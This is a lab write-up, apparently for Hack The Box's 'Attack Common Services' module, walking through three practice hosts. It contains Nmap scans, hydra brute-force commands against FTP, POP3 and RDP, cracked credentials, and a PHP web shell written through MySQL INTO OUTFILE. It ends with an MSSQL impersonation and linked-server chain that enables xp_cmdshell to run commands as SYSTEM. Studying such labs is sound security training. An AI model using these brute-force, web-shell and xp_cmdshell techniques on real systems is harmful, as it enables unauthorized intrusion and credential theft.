Attack Common Services

Easy Lab
We were commissioned by the company Inlanefreight to conduct a penetration test against three
different hosts to check the servers' configuration and security. We were informed that a flag had been
placed somewhere on each server to prove successful access. These flags have the following format:
• HTB{...}
Our task is to review the security of each of the three servers and present it to the customer. According
to our information, the first server is a server that manages emails, customers, and their files.

Step 1: Scanning the target to get information, identifying services are running on it,…

Nmap scanning command:

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- -v 10.129.203.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-25 10:52 EDT
<SNIP…>
Discovered open port 3389/tcp on 10.129.203.7
Discovered open port 21/tcp on 10.129.203.7
Discovered open port 25/tcp on 10.129.203.7
Discovered open port 443/tcp on 10.129.203.7
Discovered open port 587/tcp on 10.129.203.7
Discovered open port 3306/tcp on 10.129.203.7
Discovered open port 80/tcp on 10.129.203.7
<SNIP…>
PORT STATE SERVICE VERSION
21/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| Command unknown, not supported or not allowed...
| Command unknown, not supported or not allowed...
| NULL, SMBProgNeg:
|_ 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| ssl-cert: Subject:
commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
|_SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
|_ssl-date: 2022-09-25T15:04:20+00:00; +1s from scanner time.
25/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.203.7/dashboard/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
443/tcp open ssl/https Core FTP HTTPS Server
| ssl-cert: Subject:
commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Issuer: commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
|_SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
|_http-server-header: Core FTP HTTPS Server
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date:Sun, 25 Aug 2022 15:03:49 GMT
| Server: Core FTP HTTPS Server
| Connection: close
| WWW-Authenticate: Basic realm="Restricted Area"
| Content-Type: text/html
| Content-length: 61
| <BODY>
| <HTML>
| HTTP/1.1 401 Unauthorized
| </BODY>
| </HTML>
| HTTPOptions:
|_ Command Not Recognized
|_ssl-date: 2022-09-25T15:04:20+00:00; +1s from scanner time.
587/tcp open smtp hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 11
| Capabilities flags: 63486
| Some Capabilities: FoundRows, SupportsCompression, DontAllowDatabaseTableColumn,
ConnectWithDatabase, Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld,
SupportsTransactions, IgnoreSigpipes, InteractiveClient, IgnoreSpaceBeforeParenthesis,
Speaks41ProtocolNew, ODBCClient, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleResults,
SupportsMultipleStatments
| Status: Autocommit
| Salt: z~,Zb\)VV+r#OFO<}"/f
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EASY
| Issuer: commonName=WIN-EASY
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-09-24T14:50:53
| Not valid after: 2023-03-26T14:50:53
| MD5: 8db9 a993 1b53 8520 ea59 2236 83b2 cb78
|_SHA-1: 8620 9311 72ab b6fb 8014 6beb 092e b445 a9ec d768
| rdp-ntlm-info:
| Target_Name: WIN-EASY
| NetBIOS_Domain_Name: WIN-EASY
| NetBIOS_Computer_Name: WIN-EASY
| DNS_Domain_Name: WIN-EASY
| DNS_Computer_Name: WIN-EASY
| Product_Version: 10.0.17763
|_ System_Time: 2022-09-25T15:03:55+00:00
|_ssl-date: 2022-09-25T15:04:19+00:00; +1s from scanner time.
<SNIP…>

Reviewing the Nmap report, we just identify the common services are:
FTP: 21
SMTP: 25, 587
Web service: 80, 443
MySQL: 3306
RDP: 3389

Analysing the Nmap report, we need to the credential to login the services like FTP, MySQL, RDP, SMTP
and Web service (443), but we don’t know the credential!
We tried to access to web service via port 443 (this is the core FTP HTTPS server):
Try again with Nmap and -vv option for the greater effect to see more information.
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p21,25,80,443,587,3306,3389 -vv 10.129.203.7
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-25 11:10 EDT
<SNIP…>
<SNIP…>
PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 127
| fingerprint-strings:
| GenericLines:
| 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| Command unknown, not supported or not allowed...
| Command unknown, not supported or not allowed...
| NULL, SMBProgNeg:
|_ 220 Core FTP Server Version 2.0, build 725, 64-bit Unregistered
| ssl-cert: Subject:
commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizati
onalUnitName=Test/[email protected]/localityName=test
| Issuer:
commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizati
onalUnitName=Test/[email protected]/localityName=test
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
| SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
| -----BEGIN CERTIFICATE-----
| MIIDcDCCAlwCAQAwCQYFKw4DAg8FADCBgTELMAkGA1UEBhMCVVMxCzAJBgNVBAgM
| AkZMMQ0wCwYDVQQHDAR0ZXN0MQ0wCwYDVQQLDARUZXN0MRAwDgYDVQQKDAdUZXN0
| aW5nMSYwJAYJKoZIhvcNAQkBFhdmaW9uYUBpbmxhbmVmcmVpZ2h0Lmh0YjENMAsG
| A1UEAwwEVGVzdDAeFw0yMjA0MjExOTI3MTdaFw0zMjA0MTgxOTI3MTdaMIGBMQsw
| CQYDVQQGEwJVUzELMAkGA1UECAwCRkwxDTALBgNVBAcMBHRlc3QxDTALBgNVBAsM
| BFRlc3QxEDAOBgNVBAoMB1Rlc3RpbmcxJjAkBgkqhkiG9w0BCQEWF2Zpb25hQGlu
| bGFuZWZyZWlnaHQuaHRiMQ0wCwYDVQQDDARUZXN0MIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEAyIqPoz6lLLrXPxHA5semtXjj1FLwBoVdRksIyqeoRyEU
| pCvY9sxLnJr4KPEF0joEmcJbpiOCyx+SuiTtLVS6CUhKAglBv/M1QZmI20JZGSyf
| 8d36rPVc2ZFO4uV/6LVLVtAsVKbBgVJXOv2eJRv/xoqXgvP1EdsbdlmktY7TDaro
| 0xHfvZkqbW0mNSYAOww15GG9U5QHOSJbIZ7pomWSF4MRX7Yd3OjHs5xWdrkBoCeZ
| mMZk4BvjKpxkKhgYaggeg/GhghpE2+JZebHdwUg/z9jhikb/FpSYTFr0vtwXj0AJ
| nlzYPR18j1QoBrgxGzaj4b1vbDA4mH9xcVHE3WMqeQIDAQABMAkGBSsOAwIPBQAD
| ggEBAAW5SJCbcVLWsC9PisIna5EYiIVAOj1fpFpa2n6qWr9ibivs3DEZq0BsiH0O
| +VQsWhwzL9RZOzPCK19/12+D44H4+Zyx0/yUi7XwCZ/3n6WkG49FDi3gNpEO8+QX
| rq5E2ZCoEsyrtl4cNgKr12oibHd/FsH2nViymh2yJZpnVkfCTGCYnbURiiSjQXgx
| 4a8XlM4exqEEYC1hfwUCWRytfdS4yybZ3rDTVJDsQFMxUT++NTIayPnlDLA298xZ
| KuXOTzuf6pjUC5EMkncqdec8o4cVO1t4WJCs0iMaKH6tCB3oY80cYK0Z1PzQzYjz
| W5IEUFA9sdz67h79xdQcQHPHZmM=
|_-----END CERTIFICATE-----
|_ssl-date: 2022-09-25T15:11:46+00:00; +1s from scanner time.
25/tcp open smtp syn-ack ttl 127 hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http syn-ack ttl 127 Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
| http-title: Welcome to XAMPP
|_Requested resource was http://10.129.203.7/dashboard/
|_http-favicon: Unknown favicon MD5: 56F7C04657931F2D0B79371B2D6E9820
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
443/tcp open ssl/https syn-ack ttl 127 Core FTP HTTPS Server
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date:Sun, 25 Aug 2022 15:11:11 GMT
| Server: Core FTP HTTPS Server
| Connection: close
| WWW-Authenticate: Basic realm="Restricted Area"
| Content-Type: text/html
| Content-length: 61
| <BODY>
| <HTML>
| HTTP/1.1 401 Unauthorized
| </BODY>
|_ </HTML>
| ssl-cert: Subject:
commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizati
onalUnitName=Test/[email protected]/localityName=test
| Issuer:
commonName=Test/organizationName=Testing/stateOrProvinceName=FL/countryName=US/organizati
onalUnitName=Test/[email protected]/localityName=test
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: shaWithRSAEncryption
| Not valid before: 2022-04-21T19:27:17
| Not valid after: 2032-04-18T19:27:17
| MD5: 27ed 2da8 8b25 57e3 d2fc c0c8 9f0b 55b0
| SHA-1: 5018 d8d5 ba6b 5a1c 8df6 5969 45d7 fe06 3d32 7fad
| -----BEGIN CERTIFICATE-----
| MIIDcDCCAlwCAQAwCQYFKw4DAg8FADCBgTELMAkGA1UEBhMCVVMxCzAJBgNVBAgM
| AkZMMQ0wCwYDVQQHDAR0ZXN0MQ0wCwYDVQQLDARUZXN0MRAwDgYDVQQKDAdUZXN0
| aW5nMSYwJAYJKoZIhvcNAQkBFhdmaW9uYUBpbmxhbmVmcmVpZ2h0Lmh0YjENMAsG
| A1UEAwwEVGVzdDAeFw0yMjA0MjExOTI3MTdaFw0zMjA0MTgxOTI3MTdaMIGBMQsw
| CQYDVQQGEwJVUzELMAkGA1UECAwCRkwxDTALBgNVBAcMBHRlc3QxDTALBgNVBAsM
| BFRlc3QxEDAOBgNVBAoMB1Rlc3RpbmcxJjAkBgkqhkiG9w0BCQEWF2Zpb25hQGlu
| bGFuZWZyZWlnaHQuaHRiMQ0wCwYDVQQDDARUZXN0MIIBIjANBgkqhkiG9w0BAQEF
| AAOCAQ8AMIIBCgKCAQEAyIqPoz6lLLrXPxHA5semtXjj1FLwBoVdRksIyqeoRyEU
| pCvY9sxLnJr4KPEF0joEmcJbpiOCyx+SuiTtLVS6CUhKAglBv/M1QZmI20JZGSyf
| 8d36rPVc2ZFO4uV/6LVLVtAsVKbBgVJXOv2eJRv/xoqXgvP1EdsbdlmktY7TDaro
| 0xHfvZkqbW0mNSYAOww15GG9U5QHOSJbIZ7pomWSF4MRX7Yd3OjHs5xWdrkBoCeZ
| mMZk4BvjKpxkKhgYaggeg/GhghpE2+JZebHdwUg/z9jhikb/FpSYTFr0vtwXj0AJ
| nlzYPR18j1QoBrgxGzaj4b1vbDA4mH9xcVHE3WMqeQIDAQABMAkGBSsOAwIPBQAD
| ggEBAAW5SJCbcVLWsC9PisIna5EYiIVAOj1fpFpa2n6qWr9ibivs3DEZq0BsiH0O
| +VQsWhwzL9RZOzPCK19/12+D44H4+Zyx0/yUi7XwCZ/3n6WkG49FDi3gNpEO8+QX
| rq5E2ZCoEsyrtl4cNgKr12oibHd/FsH2nViymh2yJZpnVkfCTGCYnbURiiSjQXgx
| 4a8XlM4exqEEYC1hfwUCWRytfdS4yybZ3rDTVJDsQFMxUT++NTIayPnlDLA298xZ
| KuXOTzuf6pjUC5EMkncqdec8o4cVO1t4WJCs0iMaKH6tCB3oY80cYK0Z1PzQzYjz
| W5IEUFA9sdz67h79xdQcQHPHZmM=
|_-----END CERTIFICATE-----
| http-methods:
|_ Supported Methods: POST
|_ssl-date: 2022-09-25T15:11:45+00:00; +1s from scanner time.
|_http-server-header: Core FTP HTTPS Server
587/tcp open smtp syn-ack ttl 127 hMailServer smtpd
| smtp-commands: WIN-EASY, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
3306/tcp open mysql syn-ack ttl 127 MySQL 5.5.5-10.4.24-MariaDB
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.4.24-MariaDB
| Thread ID: 29
| Capabilities flags: 63486
| Some Capabilities: ConnectWithDatabase, InteractiveClient, Support41Auth, SupportsTransactions,
FoundRows, Speaks41ProtocolNew, Speaks41ProtocolOld, IgnoreSigpipes, ODBCClient,
DontAllowDatabaseTableColumn, IgnoreSpaceBeforeParenthesis, SupportsLoadDataLocal,
SupportsCompression, LongColumnFlag, SupportsMultipleResults, SupportsMultipleStatments,
SupportsAuthPlugins
| Status: Autocommit
| Salt: .(zSlIeDa=I:&M3T0/<"
|_ Auth Plugin Name: mysql_native_password
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EASY
| Issuer: commonName=WIN-EASY
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-09-24T14:50:53
| Not valid after: 2023-03-26T14:50:53
| MD5: 8db9 a993 1b53 8520 ea59 2236 83b2 cb78
| SHA-1: 8620 9311 72ab b6fb 8014 6beb 092e b445 a9ec d768
| -----BEGIN CERTIFICATE-----
| MIIC1DCCAbygAwIBAgIQGTcF9W9D1aBEE8F+QQrLQjANBgkqhkiG9w0BAQsFADAT
| MREwDwYDVQQDEwhXSU4tRUFTWTAeFw0yMjA5MjQxNDUwNTNaFw0yMzAzMjYxNDUw
| NTNaMBMxETAPBgNVBAMTCFdJTi1FQVNZMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A
| MIIBCgKCAQEA1XBNciOHpyTRabHT4BBYJwCM5+mKKZMLxBDqqyyp1bqAJjWZD/4T
| 9KXsSlVN2uRtkWBmneFMHEC3LXzf9WQDZv3BOUrCrUAMFA/YrftMJfiipBlg0KI7
| rUltSGsgca1aunRKkHWa1giNSeVcXi9+zP+2ge7k3r6kf5iuCwHQ0rJ+WWmrspKk
| ZKgJ0Vmhnx8Zx7d0qHItxvQ6oLQ47UYKlaOVIhuK8Y1DJKGczguLKRMH3C434uMs
| y5RsTMV6wzJNj3oqBWGbJGk0qW0zcWwXa353+ptcyUqMPZyKpmow8ZJOF/JhqcDq
| jvlhV0aqaq1qo9oZ6ISYUdADH1EJb9umyQIDAQABoyQwIjATBgNVHSUEDDAKBggr
| BgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcNAQELBQADggEBADAg0J+U7lbR
| MFuIGfT/CsqnIJqdrmG9KOJSQTaEkMoJ4rypKJgmaLCqg4lhvV6k9FR58h+WBg9n
| eNkV6xF8amT58ZLqHucVCn/pV3g4+jK4+UI3qP7yiMpGvblChjKRuBIjFFk2dln6
| vXhCUMPIwDxmbfNxMj7cZRoi2sOIyfkr8M0qDJB9q9UpCpzYv4X88qpWE0V15kJQ
| QcaqmcrKEt4zCs0VUfMMwefYg9sMxU43yPhohhVerC4UL6zgY5IC2FHvg2monaTY
| LjYRbHQBiNS0zUpXXREN2dIDxmJuYLuPoOSTfcCCULyCSDsShqFaoP+LyYtvdqBa
| qu7i2rJbuV4=
|_-----END CERTIFICATE-----
| rdp-ntlm-info:
| Target_Name: WIN-EASY
| NetBIOS_Domain_Name: WIN-EASY
| NetBIOS_Computer_Name: WIN-EASY
| DNS_Domain_Name: WIN-EASY
| DNS_Computer_Name: WIN-EASY
| Product_Version: 10.0.17763
|_ System_Time: 2022-09-25T15:11:16+00:00
|_ssl-date: 2022-09-25T15:11:45+00:00; +1s from scanner time.
<SNIP…>

The second attempt with Nmap, we found an user, fiona.

Step 2: Attacking common services

Attacking FTP service:

We can use hydra tool to brute force attack FTP service with fiona user
┌──(root㉿kali)-[~/Desktop]
└─# hydra -l fiona -P /usr/share/wordlists/rockyou.txt ftp://10.129.203.7

We got the credential of fiona

fiona:987654321
the next processing, we can use the fiona’s credential to login FTP service.

We accessed to the FTP server on browser via port 443, and downloaded 2 files
Or we can connect to FTP by command:
┌──(root㉿kali)-[~/Desktop]
└─# ftp 10.129.203.7 21
Reading the files, we identified the Directory on the target server “C:\xampp\htdocs\” is interesting.

We should turn back to Nmap report and try to connect the MySQL service.
We tried to enumerate the MySQL database and check fiona’s permission on it, we knew that Fiona has
write permission on the database (secure_file_priv)
So we can abuse it to write the webshell on the web root directory “C:\xampp\htdocs”.

> SHOW DATABASES;

> USE test;
> SHOW GRANTS;
> SHOW VARIABLES LIKE 'secure_file_priv';
> SELECT "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE 'C:/xampp/htdocs/web_shell.php';

Step 3: Connecting the webshell

After we wrote the webshell on the web root “C:\xampp\htdocs” via MySQL service, so we could
connect it on browser like that.
 Medium Lab

The second server is an internal server (within the inlanefreight.htb domain) that manages and stores
emails and files and serves as a backup of some of the company's processes. From internal conversations,
we heard that this is used relatively rarely and, in most cases, has only been used for testing purposes so
far.

Step 1: Scanning the target to get information, identifying services are running on it,…

Nmap scanning command:

┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC -p- 10.129.201.127

Reviewing Nmap report we can list down the common services:

FTP: 2121, 30021
POP3: 110
POP3s: 995
SSH: 22
DNS: 53

We need the credential to login the common services above, during scanning phase we could not find
the credential, we tried to login FTP with anonymous.

Step 2: Attack common services

We tried to connect FTP service via port 2121 with anonymous, but it was failed.
We tried to connect FTP service via port 30021 successfully.
We identified an user, simon.
We accessed to simon folder and downloaded mynotes.txt file.

We tried to brute force pop3 service with simon user and the wordlist (mynotes.txt) by hydra tool:
┌──(root㉿kali)-[~/Desktop]
└─# hydra -l simon -P mynotes.txt 10.129.201.127 pop3
The credential that we got:
simon: 8Ns8j1b!23hs4921smHzwn

next step, we use this credential connect to pop3 service (port 110), but it was failed.
We used the credential to login FTP port 2121 and got the flag.txt, .ssh folder

We also could use the credential to SSH:

 Hard Lab
The third server is another internal server used to manage files and working material, such as forms. In
addition, a database is used on the server, the purpose of which we do not know.

Question: Submit the contents of the flag.txt file on the Administrator Desktop.

Step 1: Scanning the target to get information, identifying services are running on it,…
Following Nmap report, we identified common services like:
SMB: 139, 445
MSSQL: 1433
RDP: 3389

We need the credential to login the common services above, during the scanning phase we could not find
the credential, so we have to enumerate more information related to SMB service.

Step 2: SMB enumeration

First, we used Nmap to scan SMB service, and used smbclient tool to check share folder.
Nmap scanning:

We got nothing interesting from Nmap report above.

For the smbclient tool:

We detected Home share folder here, so w tried to login to it with Null successfully, this is time to
enumerate on it. We found the another user is John.
We tried to access to all directory on SMB share, finally we got some interesting files like:
• random.txt
• creds.txt
• information.txt
• note.txt
• secrets.txt
The information.txt is the interesting file:

Maybe we should testing with database! And following this note:

• Create a local linked server
• Simulate Impersonation.
So we need to look for the user has the right permission to simulate impersonation!
We need to login target via RDP to enumerate more and more.
We have a password lists (random.txt, creds.txt, secrets.txt) and 3 users (simon, fiona, john) who we
detected on SMB services.
The random.txt, creds.txt, secrets.txt are the password files, we can write all passwords in a new file.

Passwords.txt:
1234567
(DK02ka-dsaldS
Inlanefreight2022
Inlanefreight2022!
TestingDB123
kAkd03SA@#!
48Ns72!bns74@S84NNNSl
SecurePassword!
Password123!
SecureLocationforPasswordsd123!!
(k20ASD10934kadA
KDIlalsa9020$
JT9ads02lasSA@
Kaksd032klasdA#
LKads9kasd0-@

We need to brute force RDP service by hydra tool.

The first attempt with fiona.
┌──(root💀kali)-[~/Desktop]
└─# hydra -l fiona -P passwords.txt 10.129.203.10 rdp

Finally, we got the right credential, and RDP to our target.

┌──(root💀kali)-[~/Desktop]
└─# rdesktop -u fiona -p '48Ns72!bns74@S84NNNSl' 10.129.203.10
We can see users on the target there!
Back to our information, we have interesting users (fiona, john, simon)
We tried to connect to MSSQL via sqsh tool with fiona’s credential.
The next step, we tried to simulate impersonation! With John
Step by step exploit guide:
#Step 1: Impersonating the SA User

1> EXECUTE AS LOGIN = 'john'

2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> go

#Step 2: Identify linked Servers in MSSQL

1> SELECT srvname, isremote FROM sysservers

2> go

WINSRV02\SQLEXPRESS
1 LOCAL.TEST.LINKED.SRV 0

1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]

2> go

#Step 3: xp_cmdshell

1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV]

2> go
Msg 15281, Level 16, State 1
Server 'WIN-HARD\SQLEXPRESS', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off
as part of
the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure.
For more
information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

====> xp_cmdshell is disable

#Step 4: enable xp_cmdshell

1> EXECUTE('EXECUTE sp_configure ''show advanced options'', 1') AT [LOCAL.TEST.LINKED.SRV]

2> go
Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
1> EXECUTE('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
2> go
1> EXECUTE('EXECUTE sp_configure ''xp_cmdshell'', 1') AT [LOCAL.TEST.LINKED.SRV]
2> go
Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
1> EXECUTE('RECONFIGURE') AT [LOCAL.TEST.LINKED.SRV]
2> go
1> EXECUTE('xp_cmdshell ''whoami''') AT [LOCAL.TEST.LINKED.SRV]
2> go

nt authority\system

1> EXECUTE('xp_cmdshell ''type C:\Users\Administrator\Desktop\flag.txt''') AT [LOCAL.TEST.LINKED.SRV]

2> go

HTB{XXXXX _l!nkXXXX_$3rv3r$}